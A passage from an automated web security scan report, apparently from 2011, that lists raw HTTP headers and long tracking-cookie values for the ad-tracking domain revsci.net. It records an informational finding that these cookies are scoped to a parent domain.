clXtSQV1O+5D6jdv0llzcubEY4LQLZjAYScdrVDaE0kU1Nqmr4JwjLTRAuTAAn81nt+m5SaFdt2R/lvVk385fRZsMVoL547C76ySK9QGYIrIllyaWvYj901wwTsF6NsqyMA7GQF9Dv0YnpXgyws1hcluxywUPcQMMBqQPokkLOCdoNsQ4sU8wXDnm6sQTaPPZYU7xhV84BsqqNd4sw6PPEblBfop16oBeTlEDYr4I+5vjI6SJq9B+4ex4KLABvrR1I3XSKHPCHzW+edhsiTVkENFbUGdPxJ5PIajmY4N/uNALp+PtABTXhv/qBvdvlF/PgMYLtRX7w2VPJUb3lAY2m3TQPBIhaFN7wj2Cd3qLge5SlG0QqWlm5k1TNMYB37fQyPEr+ykPVkesKPa8MGpMvLF0i80dprDp5LIIgDblp8NYxItWiihsCOgRnjGvsl6yXHcw93FKMGq/QUWnQcLAuWAmp5TSa/VSu/65JJqobDolPkwc1sh2OwiIaGUdhjuJDSwB6t+8iN/wKcdYJxNknyMfkFp09wMyEsrb+MWEOymzDAZYkmrrXzhYgMEtf+5JmuSI6kx1bHRNDWZxIQ7KbXVF/gshYn7HGJewR9hhLhOFlhj8BncLYuHq7ll+PmcOA; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:04 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:37:03 GMT
Content-Length: 1269

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','D08734_70010','D08734_70118','D08734_70613','H07707_10872','D08734_72078','H07707_10950','H07707_10954','H07707_10987','
...[SNIP]...

13.61. http://pix04.revsci.net/H07707/b3/0/3/0806180/293330189.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/H07707/b3/0/3/0806180/293330189.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF4kmheQIMDjaxY4NY56qG7poa4ScLEaatLDiorNn5vw/ZUtic7CPZq60bIzTlnSCIjQNpmQyiPpn1WLZYGIVHHqRL8VuyK4KTktWpKfhIdHIBwclAI+6iD3yXxATNyXVdCP9qr5pUf86eVqDRYrXnrWOQjJGgQmy7sH3W0QYN9ncBmAi6AFeBtqgO+BHtTmqf+IwWdMW+vn20BWfxvnJZS8x1vTAmlPu7yTn9sxzlDvQISj2WEjZNX5rXV5ukaTRHGuM2yeuQT4RICgZT5x2mDJvn8tq9GJ7UH/gE6iPm5BKu3WqKlqylGDQsXLxPXLrxUvqZgL/GXlsGJHcV2yLjheFx52zg/AdJWYX0xIqaWFDAinkd+HFgH/FBcPcf5PGHkf42QFcsCVqWq77hxoYmwYkrpfC7Hs8gZrse1DI9+qNwbwtyVVHII0+JZJa1OaEzmF6Zw8e7llMjMyCkhULZ21J9kYowe2hqB6T83cVhkCcqx3pt3vCz1JWV+51wLTq7ZHPu9iPjPSzpK3S+ft1SGY1b15QeMEL8FbeKr45VXaZhA4iyTvuoNgHNfNAwuf5ZTSqHt3njl/nLryYbUcwVcj0rU4iQDzK3OJqawxSQEscdP/rysIqog/GQ2d00Vor80g0DqI5PW3StZUxHSWn8Mulk5ukpRBDquCzWhZQqzAYIWPSu++uiy6wK+qWj/nKwno0H8DqYoSUH0/lR3qsSkiJMZXAyDMdC0rBuy4Er5vBhC4RQE/AZM7twEeK2MA2nim3FhYD81F+53dMLxegwtk8NtBOnMUobxgR4EvlW+teQygc0uHK8DJ1E; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:40:01 GMT; Path=/
rtc_kcMU=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:40:01 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/293330189.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252F2011%252F05%252F03%252Fonex-sells-husky-international-for-2-1-billion%252F%26DM_CAT%3DNYTimesglobal%2520%253E%2520Business%2520%253E%2520Dealbook%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/onex-sells-husky-international-for-2-1-billion/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4df0b07e&0&&4dca8ab1&271d956a153787d6fee9112e9c6a9326; rsiPus_qbvO="MLsXrrEOpxpv55DW8tahZ2a57v4BlC60cICOgIfdHU7gwI+bhP0TqX40neBrVzd04YF7hotNL+h4vvc66tVVUjceSeakCP8FKl+7vpw/cPKd8tMu3PMCPoyxK8+ZjwDWyB3QMrpomCL0QiC5Kvy/YgnB8KTN7G9dLpnN5M3RK+PP1zwMehHWmM2JccWRv5ZmhNfQmN/YDBU94E+biCIoa0pKkv2eA2x+zJ1SCIL380rO+L9Lk2iLRCLsePDloY4CaZKvkWcnHN4spMzHQnUA9nMhOsrooPww0kmF/1pBhtUOQIGwwBNshy3r9jL9DmeVgwo+si4cw2GLg+UiObBCYgDoqFuF17tgWtie8ndkcM4/dxQZHmAVAFp6Cd4+NKEDE1ApHgzdWMCRN3mtXvTF3dagjo97ZcxX3TK0H5gNZL/tX25K+rZRwN8wPyK9oLx40INCM6m5859n+iEwb4c3uHEIWIExaGsanUSO3meucYKt8SqtiIB1ZKfcV2EWnE5l0JI9ym05H0J1D++1YxD2YWIf3FMp0ODLJXHC5LJl8HAXM9kRR0eUwpIWZ43I4Sxu/ghMwCqycSGD5P5qCz+NfB7cpFNnCm/MZxXAtHhkwlvld7DwvFMTxzkmteonO6+tWDCvSgxfKLeBCsnh7/g2pdMlW86tZQUhX+5vIkdTKTAbn/ygJRg0T3sdyAIGgf6VindVNH18jDokISc3IGyw/B24wJC4km6cNzLCqq3zgXP3vffJqf4px62L8VMyvj3CaMObL1w9lE2lhd4iKvN3GccP1FcTweH5kHDsZZBw7FHK1W7K9ytiQtKzGQRCBtx0rurYuoXmj+tBMHYIGgQGQbpACUKiwMwgO11XDJXNsqWXOeTs409iMvRAAhFR3MmxY/Ai8JtqiI6b0Q1+g1WTMqPGi0honF4/t46uL9iK78Kt/amFrG5zPGbmiPmMFkLKl9wLroTlxm+6qkNbYbThc0/QKEKH9b1zlGLxfdlc3hqznACvxpp0ybDR66WjOYSYr5GJsa1Cu2wcBHbKR1AxsYBzoLba+u6l87gczye8xuTrYhFfwlnHydy7IYalgPJBk32vZgWW2CXqypZtqnwMKkA2NoSDvvRLOZsd5s2E5nriVmz0A020hMNet6ezR0BbsbFJkikbhD25+D5hxe38KqYGvD586gb8nEzI0j5isfTJ/lkLrhbQFBZeshLI9NVhvhrxY3ujvMVlKz2TG/zsc7BVzk9fFPtT7mgROfudWRI+VvwrnXNE2vCSQzOJZeEAKPJctLVBCeeH5f0I+bMVOeVLPDBFeBnbAN+UOthqW+XB3wOga/8nLvsjoupDcwH+hneOk/D89Naxn/NKF3MEN04OWc1SJ6wrzqU6VhG4EvS+Zv+fJ8Gt98W7PtFLVLD0oQ=="; rsi_us_1000000="pUMV4ylDPxYY7RUCt3RYS68XU2Z/uOqvJR0SNgYO9rFAJiyyAu+FxS1Z30ODwyEFcoEx3T1Eetffz3Mf20XkwCrwYFLZZJxtyzGTJat2XTjlIN8P+hQPSL5K9zsL+kusRTvgKYlhihBhqZKK6GKen73oVAV9BWGkbl//D/fTGMFsID28cq6D7duOtAY3S7ThixmzbEOMxOHaa0VO3cDkKGVKS9qitOaUYlvgkLY1MKDOtODLrFUkILMlSRpCe7+47YCa4Yvgfmntw+kxPheKq6wDe8Fd8gOqjo+YsYcbcBetJ/UlUtydzNb+VQfdT8dEj/2h41IZ5vmY/5vsAZW1gUJs43Y9iklV1tAb9jY/G3Rk4zy39xByfOtBbqnZZm8zU97WhpjXwdwTrCSEuJ4CNdY/fhO3f+aPVPTKG9RnYRL0QJ4kFGhThODFPtf76e2qY1SQ9slSHrnY01CTJTrHMxySjJKQAVAr1obI8ilzYsPlaT1OSvYVS9TK9PoGrO5Jx5bXw/zwwE6Wrxwt7KjBiQjMb8pc2/6daLQ71r2XwEeaREz3clc3XYbmXIZKYmXXjpSqe6jB0kwcSkFst/ViDZpkDsFltV4ci5YQ/eJMqmyKrF/0uup6pq93xJKQibeBPvkCxBjBIGLPE6+meOzdSPUPxAyoXPah9kyi7C70w/Ic06E82HDgxMfptenJH+QxMcJPPGsyFAVT+6SBuOjuKJ5KYDNUBXyxL2dg7B2oqDAiqh1W+megWtR3XoJXxE+b3k70BKlvT5YvEuZ0/RALqrZKe/52guDCx1yv8IEqB3NuIb5M9E0P1eLplz4HhYGMt1XJa6PPDxd4ljqvSFEQClJtagh9UzDEFg6Cb5LdDadrKiwtHRl62r3F/lJB8Wq3syJAxzEPLO4bM0VnXvq5faJnoE+6gBD5yjyVDaOWRfQzLGIWkNHa+f2KJvAyTQlC4oHYQZOGM/cVc3WrnRQmj1KDwCk/46Dq6gu9fFpETdaKz7DpE5AVcVASeUiRu6t0E9gdbxRFlQnHfQxlj0O0yv/8sVDJfLtBv7VEv6KvS85d/vyrS+3/lJtowlLX877yZqlnDrYhsgIzJ/B2kGU/Y2tWcJtJNzrSLvL6uC6zAE3YCN+2b8ZfetlvToWWUxLm+kOAX5sNQa84+z+Y7BiXKA28ArWYuR2BzhZYqV+lNsl8IuYWHrQEhBevE6yTgfXBfZ5ZWDuef3muciM4uxq9eRevsktzwd4ZolhUro4q9RDXzP+z/Jt3SlkekF3F1UyZn5rEt9sK3VhPrPz7bFs0pGO/fShWwUhEJGkkGofDmr7oO9xVS0wlWlGR+HiZLLiNXtFztdl/InifBdzZrv7tEgPT/Ekl1qqx4lzM76Hls1fjGRalSthbIGWedXoj3t9T64fqUJnYWdom7ygUV4OI6Uek4g2aJV2sE2HBrV7ibQMfkHW6H2qlf/AvGzXk5juIW8AOsU6N3bJugxzerwleYqkN4SEXHO2TsUUB2Hii30ULmVN5KVwl4AT7t07WbQfIgUgh+J4zgAJSZ1//mvY7cAo2t7r+WZ+3UqK9EVFlB88NDlOgh4Jm3SdKvwyEx2VIxC8FQZezWpUIHfmHUohseSJ3s3QYI0FyZt+UimHMdHcAt0unq75eibm7XCXgvJjZ8QEa2uTso9gthoSRwjtm4zJD8KuDs9Dol9dL10gwkePtd9XjMMl1IiMfHEGPMzYrTXatfWNnptioKHatYztwbz3JzwC1e1SaBMwSq2wE51biaKnVTIX7gjw1dfMUEcH+SSwe4EKfaZDW3Y8jNtoFzFv7v+gK3Q=="; rtc_7N2M=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; NETSEGS_E05510=bff01c00ddc153c5&E05510&0&4df0b096&0&&4dc9f625&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF4jOhOHMMH/CFfyFZ5hBdG2vMqqLhSnJolGYsbyViGzm2jLwzYcdvSuDCX0BRE1faH6+pFVa+GWQXtDZTUlxD+4jxjaUOSiFWtaoRoWoEPzPFS/qMKOOgZxQVZZx2KCmQqCYRlyRJf87ly0DSxTUuHjFQ0X4Hi6hsBM3tptwhcQ6pKtiVzlPmT7J8YSmFCk8nGaEi8uw/pmdbUTDTCxPk3RxS+r7mTK51H+dbGZLb/kqnwYVwKVrKOpzc2O7wkmux+3qQQWO2J/PszzKC3ljESTz9399xzwtiFsZVYcKXVwxqFxDvGNQKXo0ptbR/IoxdSLmJBEm/k8mMZ4WHkJPjZT6fMEbI5g2M23AmaEQVktEetBJDbNPFWQ27V53NSmx+pbUr0pyI2ZBpEkHXsJYi7feTziLd3p9rHEXUDElkF/JDK4BDzYWVkKPFz6yF0rj48gBSTjhqU76TX+wY6WQDAsO771VDP2ZWQ68peAWlQwYgNRKVrDobMsl6Di7agpiB9HDmYOLRGRahFZ5aG28pqMAM1Tr+Xff0oMgrWQe8xRxzwwe8vpXGw4rT9C+igps38c4NeHf1CSRNEED0Jm5vJTYtXtUDzReM8DBkX/5JkBX/qzA5lWYdNDWFzS9g1w5KXoKaJg69pf1NlatkBfBiRcEHScBpuUwlRJmrCGw0lwi9+bw49w4oH4B2qCyGtXeffMGFLmqGAexJ/ip9a493D3IuopZA+WpqUSxXe46vF0c/pbTxtRrIU7WJlylcbBJXhflB+EIhozrNpB8OPVg3wrWUAHsFiuEGdVpqWPCVi/Zce0YDq4+IuuqpUnU=; udm_0=MLv39CEJZjpv597JwHIRxS7gdG4nwPAq6ZuDH+vX93uE8x+80+EqavgLMjsVMcRzx4ED/5sU/DdHAgOy6ZFF6u9krYB07BFG6K2gCx9zATNAOyKPGfTqVHvkpDwSF+KJXhEbXYpBgIjd3IWX3TqLfPz6jE8vTUf3pdaWUiZB3YUWt0CiIC5F0X3tPgb/SivyvtveJcRXnIKv7kXwRgYvCvr55V+AZTEVXPZ4e3YCovCIOgMpRBSkPQefrNyf8+fevxeSnnxLtLBTd7bn/zQn98TJd0YWeOHbFIVzmnJlL/meZ5F8yEzm7HiS+gYXKCqjfBEgEJXe7pa4nhHi/FyghIrWjtv72jtBRuTmEa1PtCcp9wfqOSXME/TC3DDlgc0Ij565ULgb+NLzIZ6TpI8vIyqOkYR2CJSFdZdVnBUG0ncgAuL4be/4qG/lpeLJAr4R2ZcdSh9ENtyBu0UsstxyoNHHwBT0SxG1olEQxWdxat7mSTK4NzNH7bvJyyZeNxeZoviFwczbub9BMnSayVKnrf8mLmZYn0G+URiIr9to1aqeDG6xKYVAmQwGVEGKynGOyuqpwObt+MyvmywUWEZ1qy3YzLOSZi95dlvgQqf5nm2jI0E/rWzPceCg9nrDXdY5aA2KiG6/Ag/Qtn9BE0P6tHnl8GXHStyZrY4yXNhIUbljw44dlYagYpCHt4M3J4bPZG8YwZUp0ecARePUDtezFyfvRsc1iatb1pDP+cq/6Iul6LmWpIrzCvxlo9THyXVf5SG33tg9Lw2R/Ro5VrxlHAMqi5EG0xBZZuKHWEnXQrAXGw8FaURhjx71p9CkHtHT1BpsJC15G4HDCuuHnAqa2MRPkYaEZL2cVa7b84SiSmL76sma6ZAVTmsWibG6oMtgf+rO6uurjCoZJ5OCsW83NGfMcjZCzPl33xUGXappEWzObGyaUvOz7ose722NuQ6CgmfMlORcS+CfKwXULjWH6Zy36QCvGrnsM/T/4K0FLlEQnA/ZrpS8O/uyK8UlrSZbknpF5SKlqTmNy5yEGuQ4SS+qP+oPyRgWbGkd6TLhbS8wVZYRN53ZAc0jxNNVRDNVFRE9QSI2VrlZ/Ka1RizjzXzy0Mrq6kcHNlCK91uDwhC94dfZh3mu4LEbkhOgwvScvmwGeZy8gGWoQEjk0gAgb9SgQmtGBl5C+T7TrdHq6EejqJkS0OH/st2RxRBZGNqPJSPFO3Z9nkwH7dr0G89yU1lVThr9TPeyrKuuQlOnafjtcNVr+buGb3emJOGcjzfH90v2UdAQiKm9gZ6BDbLaq/nbVWxP/5HqWbZLa2/RS2GM94ibxZPKXwTQTSnoK6758zl7N8nLPQGrb7mauaNrJ0v4zNciOQWnVNzZaqhQO8UVgcjuWrUQiJTPQWDKxu4w8eoM53ZEdNIh7WnKbwDRVqkqD0y1KsGwOeg2fZkSaLcNFed69lS3DYgh37CBN1ozAybkSybs/DUjRL93JTQZlPIkdLkbJkhmGdhN2G2Xb4uomwrwx4xxkHDHG3BOj3sObWJNvojJs1Id/pPS2nPanvOm

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_7N2M=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
